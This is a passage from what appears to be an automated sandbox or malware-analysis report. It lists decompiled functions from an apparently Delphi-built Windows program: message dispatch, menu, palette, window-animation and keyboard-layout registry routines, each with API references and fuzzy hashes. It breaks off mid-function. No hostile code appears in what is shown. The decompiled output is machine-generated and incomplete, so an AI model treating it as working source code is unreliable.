                                                                            • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                            • String ID:
                                                                            • API String ID: 2976466617-0
                                                                            • Opcode ID: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01
                                                                            • Instruction ID: 4aa519c723c9a553b380c3e93beb146f7b5c6051756f74ab7ed9f7139ab4c4a9
                                                                            • Opcode Fuzzy Hash: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01
                                                                            • Instruction Fuzzy Hash: D341FC75A00208AFEB10DFD9C985F9EB7F9EF48304F1141A5BA04EB391D678AE41CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E00456A5C(void* __eax, struct HWND__** __edx) { 				long _v20; 				intOrPtr _t17; 				intOrPtr _t30; 				void* _t46; 				void* _t50; 				struct HWND__** _t51; 				struct HWND__* _t52; 				struct HWND__* _t53; 				void* _t54; 				DWORD* _t55;  				_t55 = _t54 + 0xfffffff8; 				_t51 = __edx; 				_t50 = __eax; 				_t46 = 0; 				_t17 =  *((intOrPtr*)(__edx + 4)); 				if(_t17 < 0x100 || _t17 > 0x109) { 					L19: 					return _t46; 				} else { 					_t52 = GetCapture(); 					if(_t52 != 0) { 						GetWindowThreadProcessId(_t52, _t55); 						_t11 = _t50 + 0x30; // 0x0 						GetWindowThreadProcessId( *_t11,  &_v20); 						if( *_t55 == _v20 && SendMessageA(_t52, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) { 							_t46 = 1; 						} 						goto L19; 					} 					_t53 =  *_t51; 					_t2 = _t50 + 0x44; // 0x0 					_t30 =  *_t2; 					if(_t30 == 0 || _t53 !=  *((intOrPtr*)(_t30 + 0x29c))) { 						L7: 						if(E004374D8(_t53) == 0 && _t53 != 0) { 							_t53 = GetParent(_t53); 							goto L7; 						} 						if(_t53 == 0) { 							_t53 =  *_t51; 						} 						goto L11; 					} else { 						_t53 = E004423F8(_t30); 						L11: 						if(IsWindowUnicode(_t53) == 0) { 							if(SendMessageA(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) { 								_t46 = 1; 							} 						} else { 							if(SendMessageW(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) { 								_t46 = 1; 							} 						} 						goto L19; 					} 				} 			}                        


                                                                            APIs
                                                                            • GetCapture.USER32 ref: 00456A82
                                                                            • IsWindowUnicode.USER32(00000000), ref: 00456AC5
                                                                            • SendMessageW.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456AE0
                                                                            • SendMessageA.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456AFF
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00456B0E
                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00456B1C
                                                                            • SendMessageA.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456B3C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                            • String ID:
                                                                            • API String ID: 1994056952-0
                                                                            • Opcode ID: 988f28035e725d6b90499869a6500e627582e695e9a65bec0a14398d4c93cf55
                                                                            • Instruction ID: cf72f3f59c931989ad5c2206f26d5bdc5f1bc31332a3f3f8568b50df8a80e80a
                                                                            • Opcode Fuzzy Hash: 988f28035e725d6b90499869a6500e627582e695e9a65bec0a14398d4c93cf55
                                                                            • Instruction Fuzzy Hash: 3E219EB12042486FD620EA69C940F67B3DC9F09316B52843AFE59D3783DB28FC04C729
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
                                                                                                                                  E0042715C(void* __ebx) { 				struct HDC__* _v8; 				struct tagPALETTEENTRY _v1000; 				struct tagPALETTEENTRY _v1004; 				struct tagPALETTEENTRY _v1032; 				signed int _v1034; 				short _v1036; 				void* _t24; 				int _t52; 				intOrPtr _t59; 				void* _t61; 				void* _t62;  				_t61 = _t62; 				_push(__ebx); 				_v1036 = 0x300; 				_v1034 = 0x10; 				E00402EFC(_t24, __ebx, 0x40,  &_v1032); 				_v8 = GetDC(0); 				_push(_t61); 				_push(0x427259); 				_push( *[fs:eax]); 				 *[fs:eax] = _t62 + 0xfffffbf8; 				_t52 = GetDeviceCaps(_v8, 0x68); 				if(_t52 >= 0x10) { 					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032); 					if(_v1004 != 0xc0c0c0) { 						GetSystemPaletteEntries(_v8, _t52 - 8, 8, _t61 + (_v1034 & 0x0000ffff) * 4 - 0x424); 					} else { 						GetSystemPaletteEntries(_v8, _t52 - 8, 1,  &_v1004); 						GetSystemPaletteEntries(_v8, _t52 - 7, 7, _t61 + (_v1034 & 0x0000ffff) * 4 - 0x420); 						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000); 					} 				} 				_pop(_t59); 				 *[fs:eax] = _t59; 				_push(0x427260); 				return ReleaseDC(0, _v8); 			}                        


                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0042718A
                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 004271A6
                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004271C5
                                                                            • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 004271E9
                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00427207
                                                                            • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0042721B
                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0042723B
                                                                            • ReleaseDC.USER32 ref: 00427253
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                            • String ID:
                                                                            • API String ID: 1781840570-0
                                                                            • Opcode ID: e91d54244fb84fac95d03ed3f74244df58bb9bf0f4995b59ae57cf6a99570862
                                                                            • Instruction ID: ce3a1c45e00d95f86b6b4c0876be039325c7f876ce5768e959d2bcb4caf90edf
                                                                            • Opcode Fuzzy Hash: e91d54244fb84fac95d03ed3f74244df58bb9bf0f4995b59ae57cf6a99570862
                                                                            • Instruction Fuzzy Hash: A121A6B1A44218EAEB10DBA5CD81FAE73ECEB08704F5104AAF705F71C1D6799E509B38
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
E0045057C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
    char _v8;
    char _v12;
    char _v16;
    char _v20;
    void* _t46;
    void* _t66;
    void* _t73;
    struct HMENU__* _t76;
    struct HMENU__* _t82;
    intOrPtr _t89;
    void* _t91;
    intOrPtr _t93;
    intOrPtr _t95;
    intOrPtr _t99;
    void* _t104;
    intOrPtr _t112;
    void* _t127;
    intOrPtr _t129;
    void* _t132;

    _v20 = 0;
    _t129 = __edx;
    _t104 = __eax;
    _push(_t132);
    _push(0x450790);
    _push( *[fs:eax]);
    *[fs:eax] = _t132 + 0xfffffff0;
    if(__edx == 0) {
        L7:
        _t44 = *((intOrPtr*)(_t104 + 0x290));
        if( *((intOrPtr*)(_t104 + 0x290)) != 0) {
            E00433BC8(_t44, 0, 0);
        }
        if(( *(_t104 + 0x1c) & 0x00000008) != 0 || _t129 != 0 && ( *(_t129 + 0x1c) & 0x00000008) != 0) {
            _t129 = 0;
        }
        *((intOrPtr*)(_t104 + 0x290)) = _t129;
        if(_t129 != 0) {
            E00420738(_t129, _t104);
        }
        if(_t129 == 0 || ( *(_t104 + 0x1c) & 0x00000010) == 0 && *((char*)(_t104 + 0x271)) == 3) {
            _t46 = E004426F4(_t104);
            __eflags = _t46;
            if(_t46 != 0) {
                SetMenu(E004423F8(_t104), 0);
            }
            goto L30;
        } else {
            if( *((char*)( *((intOrPtr*)(_t104 + 0x290)) + 0x5c)) != 0 || *((char*)(_t104 + 0x277)) == 1) {
                if(( *(_t104 + 0x1c) & 0x00000010) == 0) {
                    __eflags = *((char*)(_t104 + 0x277)) - 1;
                    if( *((char*)(_t104 + 0x277)) != 1) {
                        _t66 = E004426F4(_t104);
                        __eflags = _t66;
                        if(_t66 != 0) {
                            SetMenu(E004423F8(_t104), 0);
                        }
                    }
                    goto L30;
                }
                goto L21;
            } else {
                L21:
                if(E004426F4(_t104) != 0) {
                    _t73 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x290)))) + 0x34))();
                    _t76 = GetMenu(E004423F8(_t104));
                    _t154 = _t73 - _t76;
                    if(_t73 != _t76) {
                        _t82 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x290)))) + 0x34))();
                        SetMenu(E004423F8(_t104), _t82);
                    }
                    E00433BC8(_t129, E004423F8(_t104), _t154);
                }
                L30:
                if( *((char*)(_t104 + 0x276)) != 0) {
                    E00451B54(_t104, 1);
                }
                E004504B4(_t104);
                if( *((intOrPtr*)(_t104 + 0x298)) != 0 && ( *(_t104 + 0x1c) & 0x00000010) != 0 && *((intOrPtr*)(_t104 + 0x30)) != 0) {
                    SetWindowPos(E004423F8(_t104), 0, 0, 0, 0, 0, 0x37);
                    E0043BC9C(_t104, 0, 0x85, 0);
                    E0043BC9C(_t104, 0, 0xf, 0);
                }
                _pop(_t112);
                *[fs:eax] = _t112;
                _push(0x450797);
                return E0040473C( &_v20);
            }
        }
    }
    _t89 = *0x466584; // 0x27c66a0
    _t91 = E00454684(_t89) - 1;
    if(_t91 >= 0) {
        _v8 = _t91 + 1;
        _t127 = 0;
        do {
            _t93 = *0x466584; // 0x27c66a0
            if(_t129 == *((intOrPtr*)(E00454670(_t93, _t127) + 0x290))) {
                _t95 = *0x466584; // 0x27c66a0
                if(_t104 != E00454670(_t95, _t127)) {
                    _v16 = *((intOrPtr*)(_t129 + 8));
                    _v12 = 0xb;
                    _t99 = *0x462bbc; // 0x423728
                    E00406740(_t99, &_v20);
                    E0040C158(_t104, _v20, 1, _t127, _t129, 0, &_v16);
                    E00404184();
                }
            }
            _t127 = _t127 + 1;
            _t10 = &_v8;
            *_t10 = _v8 - 1;
        } while ( *_t10 != 0);
    }
}

                                                                            APIs
                                                                            • GetMenu.USER32(00000000), ref: 004506A0
                                                                            • SetMenu.USER32(00000000,00000000), ref: 004506BD
                                                                            • SetMenu.USER32(00000000,00000000), ref: 004506F2
                                                                            • SetMenu.USER32(00000000,00000000,00000000,00450790), ref: 0045070E
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00450755
                                                                            Strings
                                                                            • (7B , xrefs: 004505EC
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Menu$LoadStringWindow
                                                                            • String ID: (7B
                                                                            • API String ID: 1738039741-3251261122
                                                                            • Opcode ID: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc
                                                                            • Instruction ID: 391e45c69739de599930f1571a303692f4f31b01482e4dca29fa4868e8c2a8c8
                                                                            • Opcode Fuzzy Hash: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc
                                                                            • Instruction Fuzzy Hash: F151AE34A043445BEB24EF39998675B2694AB8430AF0544BFFC059B397CABCDC498B99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
E00443BBC(intOrPtr* __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    intOrPtr* _v8;
    void _v12;
    intOrPtr _v16;
    int _v24;
    int _v28;
    intOrPtr _v32;
    char _v36;
    signed int _t81;
    intOrPtr* _t82;
    intOrPtr _t93;
    signed int _t107;
    signed int _t120;
    signed char _t121;
    intOrPtr _t138;
    intOrPtr _t147;
    void* _t150;

    asm("movsd");
    asm("movsd");
    asm("movsd");
    asm("movsd");
    _t120 = __ecx;
    _v8 = __eax;
    _t147 = *0x462f14; // 0x466584
    *((char*)(_v8 + 0x258)) = 1;
    _push(_t150);
    _push(0x443da0);
    _push( *[fs:edx]);
    *[fs:edx] = _t150 + 0xffffffe0;
    E0043AA4C(_v8, __ecx, __ecx, _t147);
    _v16 = _v16 + 4;
    E0043BD44(_v8, &_v28);
    if(E00454628() < *(_v8 + 0x4c) + _v24) {
        _v24 = E00454628() - *(_v8 + 0x4c);
    }
    if(E00454634() < *(_v8 + 0x48) + _v28) {
        _v28 = E00454634() - *(_v8 + 0x48);
    }
    if(E0045461C() > _v28) {
        _v28 = E0045461C();
    }
    if(E00454610() > _v16) {
        _v16 = E00454610();
    }
    SetWindowPos(E004423F8(_v8), 0xffffffff, _v28, _v24, *(_v8 + 0x48), *(_v8 + 0x4c), 0x10);
    if(GetTickCount() - *((intOrPtr*)(_v8 + 0x25c)) <= 0xfa) {
        _t81 = 0;
    } else {
        _t107 = _t120;
        if(_t107 != 0) {
            _t107 = *(_t107 - 4);
        }
        _t81 = _t107 & 0xffffff00 | _t107 - 0x00000064 < 0x00000000;
    }
    if(_t81 != 0 && *0x46255c != 0) {
        SystemParametersInfoA(0x1016, 0, &_v12, 0);
        if(_v12 != 0) {
            SystemParametersInfoA(0x1018, 0, &_v12, 0);
            if(_v12 == 0) {
                E0044737C( &_v36);
                if(_v32 <= _v24) {
                    _t121 = 1;
                } else {
                    _t121 = 0;
                }
            } else {
                _t121 = 2;
            }
            *0x46255c(E004423F8(_v8), 0x64, *(0x462664 + (_t121 & 0x000000ff) * 4) | 0x00040000);
        }
    }
    _t82 = *0x462da4; // 0x466580
    E0043F308(_v8, *((intOrPtr*)( *_t82 + 0x30)));
    ShowWindow(E004423F8(_v8), 4);
    *((intOrPtr*)( *_v8 + 0x80))();
    _pop(_t138);
    *[fs:eax] = _t138;
    _push(0x443da7);
    *((intOrPtr*)(_v8 + 0x25c)) = GetTickCount();
    _t93 = _v8;
    *((char*)(_t93 + 0x258)) = 0;
    return _t93;
}

                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00443DA0), ref: 00443CA1
                                                                            • GetTickCount.KERNEL32 ref: 00443CA6
                                                                            • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00443CEA
                                                                            • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00443D02
                                                                            • AnimateWindow.USER32(00000000,00000064,?), ref: 00443D47
                                                                            • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00443DA0), ref: 00443D6A
                                                                              • Part of subcall function 0044737C: GetCursorPos.USER32(?,?,00443D1E,00001018,00000000,00000000,00000000,00001016,00000000,?,00000000,00000000,000000FF,?,?,?), ref: 00447380
                                                                            • GetTickCount.KERNEL32 ref: 00443D87
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                            • String ID:
                                                                            • API String ID: 3024527889-0
                                                                            • Opcode ID: 0d3a6398bf7448182259ca20921321b585508c4eae7e957dc6a7b0303c0f6ddf
                                                                            • Instruction ID: 6ca554415f86ce21c423b390f392124ef01619902e7d0cc64a9ff58f6192d223
                                                                            • Opcode Fuzzy Hash: 0d3a6398bf7448182259ca20921321b585508c4eae7e957dc6a7b0303c0f6ddf
                                                                            • Instruction Fuzzy Hash: A4517F70A00105EFEB10DFA9C982A9EB3F5EF45705F2045A6F900EB351D778AE40DB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
E00454878(intOrPtr __eax, void* __ebx, void* __fp0) {
    intOrPtr _v8;
    int _v12;
    void* _v16;
    char _v20;
    void* _v24;
    struct HKL__* _v280;
    char _v536;
    char _v600;
    char _v604;
    char _v608;
    char _v612;
    void* _t60;
    intOrPtr _t106;
    intOrPtr _t111;
    void* _t117;
    void* _t118;
    intOrPtr _t119;
    void* _t129;

    _t129 = __fp0;
    _t117 = _t118;
    _t119 = _t118 + 0xfffffda0;
    _v612 = 0;
    _v8 = __eax;
    _push(_t117);
    _push(0x454a23);
    _push( *[fs:eax]);
    *[fs:eax] = _t119;
    if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
        L11:
        _pop(_t106);
        *[fs:eax] = _t106;
        _push(0x454a2a);
        return E0040473C( &_v612);
    } else {
        *((intOrPtr*)(_v8 + 0x34)) = E004038F8(1);
        E0040473C(_v8 + 0x38);
        _t60 = GetKeyboardLayoutList(0x40, &_v280) - 1;
        if(_t60 < 0) {
            L10:
            *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x25)) = 0;
            E0041C564( *((intOrPtr*)(_v8 + 0x34)), 1);
            goto L11;
        } else {
            _v20 = _t60 + 1;
            _v24 = &_v280;
            do {
                if(E00447838( *_v24) == 0) {
                    goto L9;
                } else {
                    _v608 = *_v24;
                    _v604 = 0;
                    if(RegOpenKeyExA(0x80000002, E0040968C( &_v600, &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019, &_v16) != 0) {
                        goto L9;
                    } else {
                        _push(_t117);
                        _push(0x4549df);
                        _push( *[fs:eax]);
                        *[fs:eax] = _t119;
                        _v12 = 0x100;
                        if(RegQueryValueExA(_v16, "layout text", 0, 0, &_v536, &_v12) == 0) {
                            E004049AC( &_v612, 0x100, &_v536);
                            *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                            if( *_v24 == *((intOrPtr*)(_v8 + 0x3c))) {
                                E004049AC(_v8 + 0x38, 0x100, &_v536);
                            }
                        }
                        _pop(_t111);
                        *[fs:eax] = _t111;
                        _push(0x4549e6);
                        return RegCloseKey(_v16);
                    }
                }
                goto L12;
                L9:
                _v24 = _v24 + 4;
                _t38 = &_v20;
                *_t38 = _v20 - 1;
            } while ( *_t38 != 0);
            goto L10;
        }
    }
    L12:
}

                                                                            APIs
                                                                            • GetKeyboardLayoutList.USER32(00000040,?,00000000,00454A23,?,027C66A0,?,00454A85,00000000,?,0043D6E3), ref: 004548CE
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00454936
                                                                            • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004549DF,?,80000002,00000000), ref: 00454970
                                                                            • RegCloseKey.ADVAPI32(?,004549E6,00000000,?,00000100,00000000,004549DF,?,80000002,00000000), ref: 004549D9
                                                                            Strings
                                                                            • layout text , xrefs: 00454967
                                                                            • System\CurrentControlSet\Control\Keyboard Layouts\%.8x , xrefs: 00454920
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                            • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                            • API String ID: 1703357764-2652665750
                                                                            • Opcode ID: 6d950a78d596bce349ac28c6b00e7c38b4d53903a2e4a87453a5ac708e1c6b62
                                                                            • Instruction ID: 59853e96f857d77ef27d539afe0c0d9e90707fb92448eacf3fe576158862f236
                                                                            • Opcode Fuzzy Hash: 6d950a78d596bce349ac28c6b00e7c38b4d53903a2e4a87453a5ac708e1c6b62
                                                                            • Instruction Fuzzy Hash: 42418074A002089FDB10DF65C982BDEB7F4EB88304F5140A6E904EB352D738AE44CF69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
E00456C8C(void* __eax, char* __ecx, struct tagMSG* __edx) {
    char _v19;
    char _t12;
    int _t13;
    void* _t14;
    int _t30;
    int _t32;
    MSG* _t42;
    void* _t43;
    char* _t45;

    _t33 = __ecx;
    _push(__ecx);
    _t42 = __edx;
    _t43 = __eax;
    _t32 = 0;
    if(PeekMessageA(__edx, 0, 0, 0, 0) != 0) {
        *_t45 = _t12;
        if( *_t45 == 0) {
            _t13 = PeekMessageA(_t42, 0, 0, 0, 1);
            asm("sbb eax, eax");
            _t14 = _t13 + 1;
        } else {
            _t30 = PeekMessageW(_t42, 0, 0, 0, 1);
            asm("sbb eax, eax");
            _t14 = _t30 + 1;
        }
        if(_t14 != 0) {
            _t32 = 1;
            if(_t42->message == 0x12) {
                *((char*)(_t43 + 0xa4)) = 1;
            } else {
                _v19 = 0;
                if( *((short*)(_t43 + 0x102)) != 0) {
                    _t33 = &_v19;
                    *((intOrPtr*)(_t43 + 0x100))();
                }
                if(E004586B8(_t43, _t33, _t42) == 0 && E00456B50(_t43, _t42) == 0 && _v19 == 0 && E00456A0C(_t43, _t42) == 0 && E00456A5C(_t43, _t42) == 0 && E004569C4(_t43, _t42) == 0) {
                    TranslateMessage(_t42);
                    if( *_t45 == 0) {
                        DispatchMessageA(_t42);
                    } else {
                        DispatchMessageW(_t42);
                    }
                }
            }
        }
    }
    return _t32;
}

                                                                            APIs
                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00456CA0
                                                                            • IsWindowUnicode.USER32 ref: 00456CB4
                                                                            • PeekMessageW.USER32 ref: 00456CD5
                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00456CEB
                                                                            • TranslateMessage.USER32 ref: 00456D74
                                                                            • DispatchMessageW.USER32 ref: 00456D80
                                                                            • DispatchMessageA.USER32 ref: 00456D88
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                            • String ID:
                                                                            • API String ID: 2190272339-0
                                                                            • Opcode ID: ce108f1353adfe3f0eabd43af3c2355551d53940c5a503e7f97a1d3e0db82999
                                                                            • Instruction ID: 5f7cc9d7226b631bc1ffbd552804f8e8163c3220582b39396143643a60f640cf
                                                                            • Opcode Fuzzy Hash: ce108f1353adfe3f0eabd43af3c2355551d53940c5a503e7f97a1d3e0db82999
                                                                            • Instruction Fuzzy Hash: 1321D92070438026F6316A254E41B7B97A54F9374AF56481FFD85A73C3DAAEBC8E421E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 55%
E004334BC(void* __ebx, void* __esi, void* __eflags) {
    char _v8;
    struct HINSTANCE__* _v12;
    intOrPtr _v16;
    char _v26;
    char _v32;
    char _v36;
    intOrPtr _t63;
    void* _t66;
    void* _t67;
    intOrPtr _t68;
    void* _t69;

    _t69 = __eflags;
    _t47 = __ebx;
    _t66 = _t67;
    _t68 = _t67 + 0xffffffe0;
    _push(__ebx);
    _v32 = 0;
    _v36 = 0;
    _v8 = 0;
    _push(_t66);
    _push(0x4335ef);
    _push( *[fs:eax]);
    *[fs:eax] = _t68;
    _v26 = 0;
    GetKeyboardLayoutNameA( &_v26);
    _v16 = E00423918(1);
    _push(_t66);
    _push(0x4335c5);
    _push( *[fs:edx]);
    *[fs:edx] = _t68;
    E004239B8(_v16, 0x80000002);
    E004049AC( &_v36, 0xa, &_v26);
    E00404A4C( &_v32, _v36, "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\");
    E00423A1C(_v16, __ebx, _v32, __esi);
    E00423C4C(_v16, &_v8, "Layout File", _t69);
    _v12 = E0040DDC0(_v8, _t47, 0x8000);
    _push(_t66);
    _push(0x4335a8);
    _push( *[fs:edx]);
    *[fs:edx] = _t68;
    *0x462548 = ( *( *(GetProcAddress(_v12, "KbdLayerDescriptor"))() + 0x28) & 1) == 1;
    _pop(_t63);
    *[fs:eax] = _t63;
    _push(0x4335af);
    return FreeLibrary(_v12);
}

                                                                            APIs
                                                                            • GetKeyboardLayoutNameA.USER32 ref: 004334E4
                                                                              • Part of subcall function 004239B8: RegCloseKey.ADVAPI32(10CC0000,00423894,00000001,00423936,?,?,0042AD66,00000008,00000060,00000048,00000000,0042AE0B), ref: 004239CC
                                                                              • Part of subcall function 00423A1C: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88
                                                                              • Part of subcall function 0040DDC0: SetErrorMode.KERNEL32 ref: 0040DDCA
                                                                              • Part of subcall function 0040DDC0: LoadLibraryA.KERNEL32(00000000,00000000,0040DE14,?,00000000,0040DE32), ref: 0040DDF9
                                                                            • GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 00433575
                                                                            • FreeLibrary.KERNEL32(?,004335AF,?,00000000,00000000,004335EF), ref: 004335A2
                                                                            Strings
                                                                            • \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\ , xrefs: 00433529
                                                                            • Layout File , xrefs: 00433541
                                                                            • KbdLayerDescriptor , xrefs: 0043356C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
                                                                            • String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
                                                                            • API String ID: 3365787578-2194312379
                                                                            • Opcode ID: 30fe6d65afb9ff2c8a4add937bd16555c20e8b1eadddcbf00d4f0d828bd5cc06
                                                                            • Instruction ID: b7f935374733f2b043a6a9212af3645c2f8cc5f46ad59cc71e04b143bdb154a3
                                                                            • Opcode Fuzzy Hash: 30fe6d65afb9ff2c8a4add937bd16555c20e8b1eadddcbf00d4f0d828bd5cc06
                                                                            • Instruction Fuzzy Hash: 9221B2B0E00209BFCB01EFA5C85299EBBB6EB8D704F518476F400A7750D77DAA41CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 56%
E004231B8(intOrPtr _a4, intOrPtr* _a8) {
    void _v20;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    void* _t24;
    int _t25;
    intOrPtr _t27;
    intOrPtr _t28;
    intOrPtr* _t30;
    intOrPtr* _t32;

    _t30 = _a8;
    _t28 = _a4;
    if( *0x46633e != 0) {
        _t25 = 0;
        if(_t28 == 0x12340042 && _t30 != 0 && *_t30 >= 0x28 && SystemParametersInfoA(0x30, 0, &_v20, 0) != 0) {
            *((intOrPtr*)(_t30 + 4)) = 0;
            *((intOrPtr*)(_t30 + 8)) = 0;
            *((intOrPtr*)(_t30 + 0xc)) = GetSystemMetrics(0);
            *((intOrPtr*)(_t30 + 0x10)) = GetSystemMetrics(1);
            asm("movsd");
            asm("movsd");
            asm("movsd");
            asm("movsd");
            _t32 = _t30;
            *(_t32 + 0x24) = 1;
            if( *_t32 >= 0x48) {
                lstrcpyA(_t32 + 0x28, "DISPLAY");
            }
            _t25 = 1;
        }
    } else {
